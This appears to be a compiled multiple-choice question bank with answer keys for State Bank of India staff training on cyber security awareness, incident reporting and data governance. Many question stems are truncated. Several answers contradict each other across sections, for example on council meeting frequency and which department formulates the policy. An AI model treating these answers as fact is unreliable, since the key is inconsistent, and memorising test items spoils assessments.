b) Time at which, the incident is brought to the knowledge of any official of
ISD, including RM & RBO CISO
c) Time at which, the incident is brought to the knowledge of any official of
LHO, including CGM & Circle CISO
d) Time at which, the incident is brought to the knowledge of any official of
ISD, including CGM & Group CISO
23. Can we create the password in other regional language (Other than English
and Hindi) in Retail Internet Banking?
a) You can use the multilingual image based virtual keyboard in Hindi or
Tamil only
b) You can use the multilingual image based virtual keyboard in Hindi or
English only.
c) The multilingual image based virtual keyboard is available in 13 languages.
d) The multilingual image based virtual keyboard is available in Hindi , Tamil,
Oriya or Marathi only
24. Pick the odd one.
a) Passwords should be complex, sufficiently long and secret.
b) Passwords should not be treated like signatures.
c) Passwords must be created using small & upper case, when own name or
short form of own name and own initials are used.
d) Users are responsible for all activities originating from their user
credentials.
25. Which of the following options is NOT a good wi-fi security practice?
a) Secure your Wi-Fi router connections by enabling WPA2 + AES security
b) Change the default network name and password of your router used for
login
c) Connect to office network strictly through company provided means
d) You can use unsecure or open Wi-Fi for official purposes in case of
emergency
26. Which one of the following is the most important aspect for an organization
as big and global as SBI to protect itself from cyber security attacks and
subsequent loss of brand image?
a) An awareness program among all the customers to provide education and
guidance on a range of topics, including email, cloud and mobile security.
b) A training and awareness program for all the employees in the
Information Security department.
c) A training awareness program that would provide education and guidance
on a range of information security topics to all the internal users of its
systems and applications.
d) A training program for all the vendors to underscore secure coding
practices.
27. Select the wrong statement.
a) EMV chip cards are vulnerable to Skimming
b) Using EMV chip cards rather than Magstripe cards in ATM is more secure
c) End-to-End encryption in the communication between the 'ATM
Terminal' and the 'ATM Switch' may prevent breaches
d) Using Tamper proof keypads and anti-skimming devices in the ATM
28. In order to report an incident, you are asked to forward the SMS received
from the Bank to a certain mobile number given in the SMS. Which of the
following SMSs is to be forwarded?
a) SMS containing the OTP for the transaction
b) SMS alert received after the transaction containing the details of the
transaction
c) either of the above
d) Neither of the above.
29. Creating IS awareness is important at all levels in the Bank. But the initiation
should start from _______________.
a) Circle Management
b) Board of Directors
c) Middle Management
d) Branch staff
30. Which of the following options is not related to ATM fraud?
a) Phishing, Vishing
b) ATM hacking, password stealing
c) Card swapping, ATM Jackpotting
d) Skimming, Cloning

31.Where is the option to change the Login password in Retail Internet Banking?
Option to change login password is in the Profile section, post login
32.Select the wrong statement.
For online meetings, share a link to a meeting on an unrestricted publicly
available social media post, only with password

33.Customer reported an unauthorised UPI transaction of Rs.72,000/- in his account. He reported the incident on the same day to the bank. The bank is not able to establish customer negligence even after completion of 90 days from the date of complaint. As per Limiting Liability of customer guidelines, how much amount does the Bank need to pay to the customer in this situation?
Rs.72,000/-

34.Which of the following statements is correct regarding creation of Profile password using the Multilingual Image based Virtual keyboard?
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special characters

35.Which of the following will not be considered as cyber incidents for reporting to RBI?
Incorrect accounting entries that are rectified subsequently

36.Pick the odd one.

Passwords must be created using small & upper case, when own name or
short form of own name and own initials are used.

37.In order to report an incident, you are asked to forward the SMS received from the Bank to a certain mobile number given in the SMS. Which of the following SMSs is to be forwarded?
SMS alert received after the transaction containing the details of the transaction

38.Websites use CAPTCHA to avoid password guessing by automated tools to prevent from _______.
Dictionary Attack

39.Select the wrong statement.
Password need not necessarily be complex but easy to remember.

40.To protect from Ransomware Malware attacks, we must __________.
All the above

41.Select the wrong statement.
EMV chip cards are vulnerable to Skimming

42.Which one of the following statements is not a threat to mobile and portable devices?
The updates in the operating systems (say Android, iOS etc.) and installed applications might compromise the security of these devices.

43.Identify some of the risks involved in using public free WiFi.
All of the above statements are correct

44.Which one of the following options does not substantiate the Acceptable
Usage Policy of our Bank?
However, Mobile and laptop given to the staff for personal holding have
exceptions to the policy.
45.Which of the following statements is not true about Acceptable usage
policy (IS Policy) of our Bank?
Employee’s mobile devices need not have Antivirus software

46.What are the timelines for reporting of cyber incidents to RBI and other
Statutory Authorities CERT-In & NCIIPC? Who should report the incident?
All cyber security incidents should be reported within 24 hours by Incident
Response & Management Team

47.Select the wrong statement from the below statements.
(i) Lock your phone with mPIN or password OR biometric when not
in use. Always keep your mobile device in a safe location.
(ii) Download the Mobile Banking application only from the
Bank’s site – www.sbi.co.in. For using Mobile Banking service
over insecure Wi-Fi, never click on any links. Always type the URL
http://mobile.prepaidsbi.com/sbiwap/ in your mobile browser
(iii) Check your linked accounts on a regular basis. Once your
transaction is over, logout of the mobile banking website and
then close the browser.
(iv) Delete any SMS from the Bank that might contain your
personal information like user Id, mPIN received at the time of
registration, or details sent to you. Do not part with your ATM
card and PIN as this may be misused for Mobile banking
registration.
All are correct
48.Cyber security incidents can be reported: by any employee or public

49.Creating IS awareness is important at all levels in the Bank. But the initiation should start from _______________.
Board of Directors
50.Which of the following options is NOT the best password security
practices?
Change your password, only if you suspect it may have been exposed
51.Impacts of Cyber risks are_________________.
All of the above
52.Many websites use CAPTCHA to avoid password guessing by automated
tools called ____________.
Dictionary Attack
53.What should be the minimum and maximum length of the login password
in Retail Internet Banking?
Minimum length should be 8 characters and maximum length 20
characters
54.Which one of the following options is not a concern for password
security?
Password is required to be sufficiently long and secret
55.Which of the following options is not related to ATM fraud?
Phishing, Vishing
56.Which of the following is NOT one of the best practices to maintain your
password?
Only difficult dictionary words should be used
57.Which one of the following options is not considered as incident for
reporting to RBI, NCIIPC and CERT-In?
Accounting/clerical errors (incorrect ledger posting – cr/dr) that are
rectified subsequently.
58.Which of the following steps would not be a part of the planning for Work
from home?
Providing connectivity through a reputed service provider
59.Which one of the following is the most important aspect for an
organization as big and global as SBI to protect itself from cyber security
attacks and subsequent loss of brand image?
An awareness program among all the customers to provide education and
guidance on a range of topics, including email, cloud and mobile security.
60.“Ransomware” can be spread through_____________?
Option 1 and 2

********

LESSON 1

Circle Data Governance Council (C-DGC) is headed by


DGM & CFO
GM NETWORK
DGM AND CDO
CIRCLE CGM

Data Governance Policy is applicable to


All employees of the Bank
All employees at Audit departments
All employees at Data Management Office
All employees at Corporate Centre

Master Data Management Process Includes ______


Create
Read
Modify & Delete
All of the Above

Which one of the following does NOT come under People factor in Data Management practices?
Data Architects
Data Owners
Data Trainers
Data Stewards

Which activity are considered under Data Management?


Handling complete Data of Organisation
Boost up Organisation Performance
Assure Data quality
All of the above

Data Governance Policy is applicable to third parties having access to SBI network and Data.
As per Vendors agreement
FALSE
TRUE
Not declared in policy

Data Protection officer reports to …..


CGM (R&DB Ops)
GM & Chief Data Management Officer
CGM (Compliance)
Chief Vigilance Officer

Which among the following may be held accountable for quality of data?
People
Processes
Practices
Technology

Data Management with lack of easy access to information for important stakeholders may result in just _________
Data Governance Strategy
Big Data Strategy
Narrow Data Strategy
None of the Above

Apex level Data Governance Council (ADGC), is headed by


DMD COO
CHAIRMAN
CDMO
MD (R&DB)

The word “Data” shall collectively refer to the following descriptions:


Data that are stored or held in servers in SBI, Data storage devices and backup media
Data owned by the Bank which are securely stored/ managed by the third party.
Data owned by the Bank which is shared with the third party
All of the above

Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result in ________
Incorrect AML/CFT compliance
In-efficient Cross-selling
Improper KYC
None of the Above

____ is DGO of Circle


DGM & CCO
DGM (Vigilance)
DGM & CFO
DGM & CRO

Poor Data Quality may result in ______


Inorganic Growth in Business
Increased Customer stickiness
Incorrect Regulatory Reporting
All of the Above

Capturing of incorrect / incomplete Data adversely affects:


Data Quality
Analytical Models
Both 1 & 2
Neither 1 nor 2

Prime objective of Data governance framework is to ensure-


Compliance with relevant legislation, regulatory requirements, policies, procedures and standards.
To define the roles and responsibilities for Data stakeholders, and to establish clear lines of accountability.
Effective assurance and control of Data management processes.
All of the above

What is the frequency of the meeting for Apex level Data Governance Council (ADGC)?
Monthly
Quarterly
Half yearly
Bi monthly

Data processes must also put in place ______


Analytical Processes
Co-ordination Processes
Monitoring Processes
All of the Above

Data Management Office reports to which of the DMDs


DMD & Group Compliance Officer
DMD & Chief Information Officer
DMD & Chief Risk Officer
DMD & Chief Operating Officer

Providing training to staff is one of the responsibilities of Data Privacy Officer


FALSE
TRUE

Administrative office Data Governance Council (A-DGC), is headed by


RM
DGM (B&O)
AGM/CM GB
GM NETWORK
Data processes must Include ____________
Definitions of how data will be stored
Definitions of how data will be analysed
Definitions of how data will be interpreted
All of the Above

Where does Data come from?


External Parties
Magically
Logs and devices
People, Process and Technology

Data processes must Include ____________


Definitions of how data will be reported
Definitions of how data will be accessed
Definitions of how data will be interpreted
All of the Above

Data Governance Policy is formulated by which Department:


Data Management Office
Data Protection Office
Information Security Department
Compliance Department

Who would be held responsible for not feeding all the customer details in CBS, given by customer in AOF?
BM
1 & 2
Checker
Maker

Which of the below helps in monitoring Data Governance Activities?


Data Process
Data Quality
Note
Dashboard

Data Governance can NOT be achieved by Technology alone.


TRUE
FALSE

What is the frequency of the meeting for Data Governance Council-Business Unit/ Vertical (DGC-BU/V)?
Bi monthly
Quarterly
Half yearly
Monthly

Data Governance process includes activities as:


Establish Data Governance Organisation
Define and Enforce Data Standard and Policies
Audit, Monitor & Control of Data Governance activities
All of the above

LESSON 2

Which of the following is not a type of Data leak


Improper categorization of sensitive Data
Submission of monthly P-report to controller in hard copy
Unauthorized transfer of Data to USB devices
Loss or theft of laptops and mobile devices

Non-sensitive Information includes:


Public Information
Routine Business information
Both 1 & 2
None of the above

Capturing of incorrect interest rate in loan accounts may result in _____________.


Income leakage
Excess Income
Customer Complaints
All of the above

In ________________ Processing, small group of transactions are processed on demand


Virtual Time
System
Batch
Real Time
Which one is NOT an approved way of sharing granular Data/access Data under normal circumstances:
E-mail
Single Sign On (SSO)
Secured File Transfer Protocol (SFTP)
Active Directory login (ADS)

Project Ganga Dashboard includes divergences related to:


Key Risk Indicators (KRI) Only
Neither DQ nor KRI
Data Quality (DQ) Only
Both DQ & KRI

What are the different categories of Data Classification


SECRET, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, PUBLIC
SENSITIVE, CONFIDENTIAL, INTERNAL, GENERAL
SENSITIVE, CONFIDENTIAL, INTERNAL, EXTERNAL

Data quality is necessary to fulfil the needs of an organization in terms of


Operations
Planning
Decision-making
All of the above

Scope of Customer Sensitive Granular Data Sharing & Access Framework covers:
All the domestic & foreign offices
All SBI employees
All the third parties having access to SBI network and granular Data
All of the above

Business Leads from Analytics comes under Customer Sensitive Granular Data
TRUE
FALSE

Some of the key Data Privacy initiatives include:


Wi-Fi encryption
Secure Cloud Data Storage system
Secured Network Access
All of the above

In an Account Opening Form, if Data has been provided by customer in non mandatory field ( like mobile number /em
Leave the field in CBS blank since it is non mandatory in CBS also
Input the Data exactly as given by the customer
Input partial / any similar Data without matching exactly as it is non mandatory in nature
All of the above

Non capturing of PAN in CIF, even if furnished in the AOF, may result in ________.
Deduction of Excess TDS
Non-reflection of TDS in Form 26 AS
Both 1 & 2
Neither 1 nor 2

Which Portal to be accessed for Data Loss Prevention (DLP) incidents


Data Infringement Portal
Project Ganga Dashboard
DQI Dashboard
MIS Online

“Customer PII Data” is classified as ____________ Data


SENSITIVE
INTERNAL
CONFIDENTIAL
PUBLIC

A staff can be held accountable for Data quality errors.


TRUE
FALSE

What does GDPR stand for-


General Data Priority Regulation
Gross Data Protection Regulation
General Data Privacy Regulation
General Data Protection Regulation

Which of the following is true:


Data Governance is about rules how to build the content
Data Privacy is about the rules how to protect and use the contents
Data Loss Prevention (DLP) tool helps in ensuring Data Privacy
All of the above

A customer has submitted Voter Card as OVD, along with AOF. During the scrutiny, it was found that the age of custo
OVD has to be accepted, as it is a govt. document
OVD can be accepted
if one can vote, he is not a minor. OVD should be accepted
DOB on OVD and AOF, if same, then only account may be opened

If a car dealer asks us for a list of customers having existing car loans, to market loans for new cars for us, shall we sh
May be shared by the Field Officer
May be shared by the Branch Manager
Either 1 or 2
Cannot be shared

Incorrect classification of values like Gender or Customer Type comes under which one of the following Data Quality
Accuracy
Validity
Consistency
Completeness

“Internal audit reports” is classified as ____________ Data


SENSITIVE
PUBLIC
CONFIDENTIAL
INTERNAL

“SBI telephone directory” is classified as ____________ Data


SENSITIVE
INTERNAL
PUBLIC
CONFIDENTIAL

Capturing of incorrect CRA rating / ECR in a loan account may result in ______.
Incorrect Interest Rate
Incorrect Risk weight
Both 1 & 2
Neither 1 nor 2

The best principles for improving Data Quality include(s)


Doing the things right at very first instance
Doing the right things every time
Either 1 or 2
Both 1 & 2 above

What are the impacts of feeding incorrect date of birth of a customer in CBS
Incorrect Customer profile
Customer could not be able to reset his INB password
1 & 2
No Impact

Sharing of Data with external agencies is governed by
SOP on Data Loss Prevention
SOP on Data Sharing with External agencies/third parties
SOP on Data Infringement
SOP on Customer Sensitive Granular Data Sharing

What are the two important pillars of the SOP on ‘Customer Sensitive Granular Data Sharing and Access – Within Ban
Regulated & Limited access
Restricted & Registered access
Free & Uncontrolled access
None of the above

In case of demand for customer Data by Regulatory Authority, it be shared as per DG Policy
FALSE
TRUE

Salient features of Project Ganga include:


Customer One view
Business Unit wise error classification
Circle-wise error classification
All of the above

LESSON 3

What is a Denial of Service Attack?


A type of attack whereby malicious commands are sent to a system/application through unauthorized channels.
It is a malicious attempt to disrupt the normal traffic of a targeted server, service or network with a flood of Internet tra
It is an attack meant to shut down a machine or network, making it inaccessible to its intended users
An attack used to monitor and potentially modify communications between two users.

Which one of the following is a precaution to be taken while operating the ATM?
Taking help from unknown persons if there is a problem with the ATM
Allow another person to watch while entering PIN
Handing over the card to another person who offered help to operate the ATM
Check if any extra suspicious device is attached to the ATM machine.

Which of the following is not a stage in SIM swapping?


After customer verification, the mobile operator deactivates the old SIM card in customer possession and issues a new
Fraudsters obtain customer’s personal data through phishing or social engineering.
Under the pretext of having lost the phone, fraudsters contact the Mobile operator and create a fake ID.
All the options above are stages of SIM Swapping

Select the correct statement about the impact of Cyber Risks.


The impact on the services or the potential of the attack infecting our customers’ systems.
Loss of Intellectual Property
financial cost in managing a cyber-attack
All are true

__________ malware is a warning-like popup or reminder in a Laptop/PC/Mobile?


Keylogger
Scareware
Fileless
Spyware

Which of the following principles of Confidentiality, the first of the CIA Triad, is/are correct?
a. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resour
b. The goal of confidentiality protection is to prevent unauthorized access to the information.
c. Confidentiality focuses security measures on ensuring that none other than the sender of a message is able to read it.
d. Secure encryption of the information ensures Confidentiality.
Only a and b
a, b and c
a, c and d
a, b and d

What is not true about SIM Swapping?


SIM Swapping is a fraud that occurs when the fraudsters manage to get a new SIM card issued for a specific registered m
Phishing or social engineering techniques are used to obtain personal information of the customers/users.
Fraudsters get access to the root of the mobile phone through SIM Swapping
Option b & c

With the enhanced sharing of information over a global network for almost all life functions , which one of the follow
Authentication
Non-repudiation
Authorization
Non-refutation

What is not true about myths associated with Cyber Risk?


Cyber threat always starts externally
IT team is alone not responsible for Cyber Security
Compliance and security are the same
Cyber security is an issue which is related with technology

How does the use of Virtual keyboard protect the customer?


It is a useless feature
It protects against Keylogger malware
It protects against computer Viruses
It protects against computer Worms.

Which one of the following is the leading illicit dark web marketplace which was taken down by the FBI in what was
Silk Road 2.0
DisrupTor
Tor
Dark Market

The technique for sending SMS that appears to be initiated from the organization for KYC updation, Account credit, A
Vishing
Spoofing
Steganography
Identity theft

The technique used to send the emails to all the employees of the Bank is known as ____________.
Smishing
Vishing
Phishing
Spear Phishing

Cyber-attacks that originate through a third party vendor are also called ________?
Service provider attacks
Supplier attacks
Supply chain attacks
Vendor attacks

What makes SolarWinds attack an unusual hack?


The hackers through one malicious code in the application of SolarWinds vendor’s application gained access to Orion so
The hackers targeted a government agency like the Pentagon
The hackers seriously damaged the energy supply
The hackers through one malicious code in SolarWinds Orion software gained access to thousands of other companies.

Your friend fears that he has shared the user credentials of OnlineSBI with a stranger. It is a Sunday and Bank is close
Change the password
Lock User access using the relevant link
Contact the Branch on Monday to deactivate INB facility
Type an incorrect login password 4 times so that the username gets locked for a day

Even if a user compromises his/her login credentials of OnlineSBI, no one can login using this credential. What is the
Audio Captcha in the login screen.
Virtual keyboard in the login screen
OTP has been made mandatory at the time of login
Image based Captcha in the login screen

Which one of the following is NOT a type of MITM attack?


DNS Spoofing
Logic Bomb
IP Spoofing
Wi-fi eavesdropping

Which of the following principles of Integrity, the second of the CIA Triad, is/are correct?
a. Integrity is the concept of protecting the accuracy and completeness of information and processing methods.
b. Integrity protection prevents any kind of alteration of the information.
c. Properly implemented integrity protection provides a means for authorized changes while protecting against intende
omission).
d. Use of a secure Hashing algorithm for the information ensures Integrity.
Only a and b
a, b and c
a, c and d
a, b and d

Which of the following browsers allows access to the Network which is popular for implementing encrypted routing
Chrome
Edge
Tor
Firefox

The fraudster gets the personal details of the people through _______technique.
Spoofing
Keylogger malware
Vishing
Social engineering

Which of the following is not an example of data?
Employees information
Customer Information
Official conversation over phone
All are examples of data

Which one is not an option for disabling UPI services?


YONO Main Screen UPI Enable/Disable UPI
CBS App menu UPI Disable/Re-enable UPI
Contact Centre: 1800112211/18004253800
Branch Interface (Maker-Checker Concept):

Ajit is doing a merchant transaction to pay the mobile bill. He selects net banking of SBI for making online payment. H
It should start with https://www.retail.onlinesbi.com
It should start with https://www.merchant.onlinesbi.sbi
It should start with https://www.onlinesbi.com
It should start with https://www.retailmerchant.sbi

If you want to change the username and password for your SBI Internet banking, which of the following statements i
You cannot change the Username but you can change the password at any time
You can change the Username but not the password
You can only interchange the username by the password and vice versa
You can change both the Username and password at any time

Which one of the following statements is false?


Organizations use Bulk SMS service for marketing and communications.
Bulk SMS simply means sending a large volume or quantity of SMS
Bulk SMS is sending SMS from mobile to many people.
The user’s response to bulk SMS can compromise their identities.

A Cyber-Attack
is not limited to, stealing, altering or destroying the systems/network, disrupting operations and causing information or
is a targeted assault on the Bank’s cyberspace and its underlying infrastructure systems
option a or b
option a & b

_____________is used for obtaining unauthorized access to mobile phones via Bluetooth connection. Once such a co
Man in the Middle attack
Bluesnarfing
Steganography
Spoofing

Which one of the following statements is FALSE about APT attacks?
A type of cyberattack where an unauthorized attacker code enters a system and remains there.
APT attacks may help the attacker in stealing information
APT attacks may be identified immediately as it shuts down the whole system
In APT attacks, attacker code may spread into other machines in the victim’s network and compromise them.

SBI internet banking site provides a facility to bypass such keylogger malware. Identify the feature.
Audio Captcha
Image Captcha
Online Virtual Keyboard
Biometric access

LESSON 4

1
Which one of the following is the most important aspect for an organization as big and global as SBI to protect itself f
A training program for all the vendors to underscore secure coding practices.
A training and awareness program for all the employees in the Information Security department.
An awareness program among all the customers to provide education and guidance on a range of topics, including ema
A training awareness program that would provide education and guidance on a range of information security topics to a

2
Who is primarily responsible for reporting cyber security incidents?
Deputy General Manager (AC) at LHO
ATM Channel Manager
Branch Manager
Regional Manager (RBO)

3
Which one of the following options does not substantiate the Acceptable Usage Policy of our Bank?
We need to protect the data by following acceptable usage policy guidelines of our bank.
All the workstations / devices should be protected by strong passwords.
However, Mobile and laptop given to the staff for personal holding have exceptions to the policy.
Always lock your desktop while leaving your seat.

4
Which of the following statements is NOT correct in the WannaCry case?
A Windows vulnerability discovered by the United States National Security Agency (NSA).
After the system got affected by WannaCry, Microsoft released the patch for the system which has updated security.
The attackers collective called The Lazarus Group.
This was only one month after Windows released patches for the exploit, meaning that computers that had yet to upda

5
Identify some of the risks involved in using public free WiFi.
All of the above statements are correct
It can expose the users to Man-in-the-middle attacks
The free WiFi could be a rogue network, harvesting the internet user’s data.
Hackers may be misusing the free Wi-Fi to distribute malware

6
Websites use CAPTCHA to avoid password guessing by automated tools to prevent from _______.
Shoulder surfing
Dictionary Attack
Brute-force Attack
Guessing

7
Which one of the following options is not a concern for password security?
In case of any breach in a Social Media Handle, delete your Social Media Account instead of changing the password.
Password is required to be sufficiently long and secret
Users are responsible for all activities originated from their User credentials
Password should be treated like signature

8
Which of the following incident(s) should be reported to RBI, CERT-In & NCIIPC?
All cyber incidents irrespective of amount of loss
Phishing / Vishing attacks on customers resulting cumulative loss for the customer(s) exceeding ₹ 50 lakh
All incidents which lead to customer service disruptions due to non-availability of IT systems
All of the above

9
If a Bank always allow some of the employees to bring their own laptops, smart phones, tablets etc. to office for offic
Bring Your Own Desktop
Bring Your Own Device
Buy Your Own Device
Budget Your Own Device

10
Can we create the password in other regional language (Other than English and Hindi) in Retail Internet Banking?
You can use the multilingual image based virtual keyboard in Hindi or English only.
The multilingual image based virtual keyboard is available in 13 languages.
You can use the multilingual image based virtual keyboard in Hindi or Tamil only
The multilingual image based virtual keyboard is available in Hindi, Tamil, Oriya or Marathi only

11
Pick the odd one.
Passwords should be complex, sufficiently long and secret.
Passwords must be created using small & upper case, when own name or short form of own name and own initials are
Users are responsible for all activities originating from their user credentials.
Passwords should not be treated like signatures.

12
Select the wrong statement about the Acceptable usage policy (IS Policy) of our Bank?
Users should not install any software that is not authorized for the Bank’s business.
Users on whose PC / Server such software runs shall be solely responsible for Copyrights / IPR violation, Legal and Pena
Successful backup of critical applications or data should be ensured yearly and to be kept offsite.
All are true

13
Which of the following statements is not true about Acceptable usage policy (IS Policy) of our Bank?
Employees, to whom State Bank owned laptops or any other Portable devices are issued, are responsible for its safe cu
Employees who are authorized to access emails and Bank’s data on mobile devices should ensure that MDM application
Employee’s mobile devices need not have Antivirus software
Loss of portable devices should be reported immediately to the local police and to the appropriate authority.

14
What action will you take when you are defrauded?
Change the username immediately
Lock the user access immediately
Send a written letter to the branch immediately
Write a letter to the RBI immediately

15
The company asked their employees to use their own devices and internet access while working from home. List som
devices of the employees (iii) Asking the employees to use enterprise VPN
Options (i) and (ii) are sufficient
Options (i) alone is sufficient
Options (i) , (ii) and (iii) are necessary
Option (ii) alone is sufficient

16
Which of the following options is NOT the best password security practices?
Enable two-factor authentication
Never completely trust service providers
Change your password, only if you suspect it may have been exposed
Never reuse a password

17
Which one of the following options is not considered as incident for reporting to RBI, NCIIPC and CERT-In?
Frauds/ Customer complaints related to frauds.
Accounting/clerical errors (incorrect ledger posting – cr/dr) that are rectified subsequently.
DoS/DDoS attack not lasting beyond 30 minutes contiguously or not impacting the customer service/digital channels ev
All of the above

18
Which of the following statements is correct regarding creation of Profile password using the Multilingual Image bas
The Profile password should be a combination of alphabets in two of the languages chosen
The Profile password should be a combination of alphabets (in the language chosen), and numerals and special charact
The Profile password should be a combination of alphabets (in the language chosen), and numerals and images
The Profile password should be a combination of alphabets (in the language chosen) and numerals

19
Which one of the following applications is not a threat to compromise confidentiality of the data of portable devices
Facebook
AirWatch agent
WhatsApp
Truecaller

20
What are the ways you can report an unauthorised transaction (ATM) without visiting the branch?
Call dedicated number 1800 1111 09 also Can raise through https://crcf.sbi.co.in
Call the Branch
Call ATM Channel Manager OR ATM Channel Manager Facilitator linked to the ATM
Option a or c

21
Which of the following steps would not be a part of the planning for Work from home?
Ensuring the physical access to the systems room is restricted and monitored
Providing connectivity through a reputed service provider
Installing Anti-Virus in these systems
Arranging official laptops with proper configuration for the employees

22
Which of the following will not be considered as cyber incidents for reporting to RBI?
Incorrect accounting entries that are rectified subsequently
All the options will not be considered
Customer complaints related to frauds.
Physical tampering of ATMs

23
Select the correct statement in this case.
Ransomware Malware uses simple encryption codes to encrypt a victim’s files.
The patches could not stop the spreading malware
The motive for this Ransomware attack is always monetary
Ransomware Malware affects more devices in less time.

24
Which one of the following options is NOT a violation of acceptable usage policy?
The laptop was not protected by password
The laptop was kept open, and the desktop was not locked
There was a breach of critical and confidential data.
There was a data vulnerability due to lack of Anti-virus

25
What are the timelines for reporting of cyber incidents to RBI and other Statutory Authorities CERT-In & NCIIPC? Who
All cyber security incidents should be reported within 24 hours by Incident Response & Management Team
All cyber security incidents should be reported within 12 hours by Incident Response & Management Team
All cyber security incidents should be reported within 2 to 6 hours by Incident Response & Management Team
All cyber security incidents should be reported within 24 to 48 hours by Incident Response & Management Team

26
Which of the following options is an example of inappropriate use of the e-mail service?
Use of other officers' user ids or using a false identity.
Authorized exchange of proprietary information or confidential information
Use the accounts of others with their permission
Creation and exchange of e-mails information or content for official purpose.

27
Cyber security incidents can be reported
by any employee or public
by home branch only
by public
by any employee

28
Method that is NOT suggested to prevent new account fraud.
Ensure ATM Card connected to operational SB Account is blocked
Contact the bank immediately and ensure all the operating accounts are closed
Ensure to lock the internet banking user ID.
Applying the use of end-to-end encryption to protect online transactions.

29
What should be the minimum and maximum length of the login password in Retail Internet Banking?
Minimum length should be 6 characters and maximum length 15 characters
Minimum length should be 8 characters and maximum length 20 characters
Minimum length should be 6 characters and maximum length 20 characters
Minimum length should be 8 characters and maximum length 15 characters

30
Select the wrong statement.
For online meetings, Manage screen sharing options. Change screen sharing to “Host Only.” Avoid file sharing
Do not play online games on company devices as they may download trojans.
Secure your Wi-Fi router connections by enabling WPA2 + AES security
For web security, verify full URL by clicking the link, but do not give any personal/confidential information

DATA GOVERNANCE AND CYBER SECURITY MODULE 1

Q: Data Governance Organisation involves a multi-tiered combination of business and technology roles which include(s)
A: All of the above

Q: Data Governance Policy is applicable to all the domestic offices of SBI including:
A: All of the above

Q: What is the frequency of the meeting for Data Governance Council-Business Unit/
Vertical (DGC-BU/V)?
A: Monthly

Q: Data processes must also put in place ______
A: All of the Above

Q: At the time of account opening, it was found that Educational Qualification was not
mentioned by the customer in AOF, but it is a mandatory field in CBS
A: Teller should contact the customer and get the required details and then fill in CBS

Q: DBAs are NOT part of Data Stakeholders
A: FALSE

Q: Data Governance process includes activities as:
A: All of the above

Q: Data governance processes primarily must focus on __________
A: Business Needs

Q: Data Governance can NOT be achieved by Technology alone.
A: TRUE

Q: Data Governance Council-Business Unit/Vertical is being headed by
A: CGM

Q: Data processes must Include ____________
A: All of the Above

Q: Data Management Officer is accountable for all Data Governance related activities of
their respective department
A: FALSE

Q: Data Governance Policy is formulated by which Department:
A: Compliance Department

Q: Data processes must Include ____________
A: All of the Above

Q: Which one of the following does NOT come under People factor in Data
Management practices?
A: Data Trainers

Q: Data processes must also put in place ______
A: All of the Above

Q: Data Governance Policy is applicable to third parties having access to SBI network
and Data
A: TRUE

Q: Administrative office Data Governance Council (A-DGC), is headed by
A: DGM (B&O)

Q: Where does Data come from?
A: People, Process and Technology

Q: Which among the following play major role in support of company-wide Data quality
initiatives?
A: People

Q: Data is always originated within the organization
A: FALSE

Q: (i) Data Governance is about the rules how to build the content.
(ii) Data Privacy is about the rules how to protect and use the content.
A: Only (ii) is correct

Q: Against availability of sizeable number of eligible customers only few confirmed leads
could be generated for an Analytics based product. What could be the underlying
reason?
A: Poor Data Quality

Q: Incorrect handling of data may result in exposing an organization to significant liabilities.
A: TRUE

Q: Technology Solutions which help in data Governance initiatives include ____
A: All of the Above

Q: Which activity are considered under Data Management?
A: All of the above

Q: What are the main sources for low Data Quality?
A: Manual Data Entry

Q: While creating new CIF, customer has given marital status, but as it is not mandatory
in CBS:
A: As the customer has given the details in AOF, teller should fill the same in CBS

Q: DBAs are NOT part of Data Stakeholders
A: FALSE

Q: What is the frequency of the meeting for Data Governance Council-Business Unit/
Vertical (DGC-BU/V)?
A: Quarterly

Q: Technology Solutions which help in data Governance initiatives include ______
A: All of the Above

Q: Process for submission and handling of the Data request is mentioned in
A: Both

Q: _________________is ultimately accountable with regard to the definition, Data quality and value of Data in a given subject area.
A: Data Custodian

Q: Data processes must Include ____________
A: All of the Above

Q: Who among the following has a role to ensure that data governance initiatives are
aligned with business needs
A: Data Team

Q: Inconsistent Data in Annual Income fields vis a vis customer profile may primarily result
in ________
A: Incorrect AML/CFT compliance

Q: Where does Data come from?
A: People, Process and Technology

Q: Data Governance Policy is applicable to third parties having access to SBI network and
Data.
A: TRUE

Q: What is/are the responsibility(ies) of the Data Governance Council (DGC)
A: All of the above

Q: Against availability of sizeable number of eligible customers only few confirmed leads
could be generated for an Analytics based product. What could be the underlying reason?
A: Poor Data Quality

Q: Data Governance process includes activities as:
A: All of the above

Q: Data Governance Policy is applicable to
A: All employees of the Bank

Q: Prime objective of Data governance framework is to ensure-
A: All of the above

Q: Data Management Office reports to which of the DMDs
A: DMD & Chief Information Officer

Q: Data Governance can NOT be achieved by Technology alone.
A: TRUE

Q: As per the Bank's Data Governance structure, presently which is the Apex body for Data
Governance?
A: Apex level Data Governance Council (ADGC)

Q: Which of the following is/are a Key Data Quality Dimension?
A: All of the above

Q: The primary priority of Data Processes must be _____
A: MIS Needs

Q: ________shall ensure that there is commensurate adherence, management and periodic upkeep/review for Data in their respective custodies, as prescribed by Data Governance Policy
A: Data custodians

Q: Which among the following play major role in support of company-wide Data quality
initiatives?
A: Regulators

Q: Data-driven business decisions are possible when _____ is involved in the Data
Governance.
A: Business Unit

Q: ____ is DGO of Circle
A: DGM & CRO

Q: Data governance processes primarily must focus on __________
A: Business Needs

Q: Data processes must Include ____________
A: Definitions of how data will be moved and changed

Q: Data processes must also put in place ______
A: All of the Above

Q: The word “Data” shall collectively refer to the following descriptions:
A: All of the above

Q: Analytics refers to the process of using Data in order to:
A: All of the above

DATA GOVERNANCE & CYBER SECURITY MODULE -2

Q: Which of the following is true:
A: Data Privacy is about the rules how to protect and use the contents

Q: An SBI Card employee sitting in a branch asks for list of high value customers
along with Mobile numbers for telecalling to sell SBI cards for the Branch. Branch
may share the list with SBI Card employee.
A: FALSE

Q: What is needed to create Data Quality Index?
A: Data quality rule and profiling results.

Q: Capturing of incorrect security in secured loan accounts may result in _____________.
A: Both 1 & 2

Q: While verifying the pop-up name of PAN holder in CIF creation screen
A: 1 & 3

Q: As per Data Protection Bill (Draft) PII stands for
A: Personally Identifiable Information

Q: To boost the housing loan business of the branch , list of HNIs can be shared with
HLCs through:
A: Not to be shared

Q: India is coming with its own Bill on Data Protection which is called ___
A: Personal Data Protection Bill

Q: Project Ganga Dashboard include divergences related to:
A: Both DQ & KRI

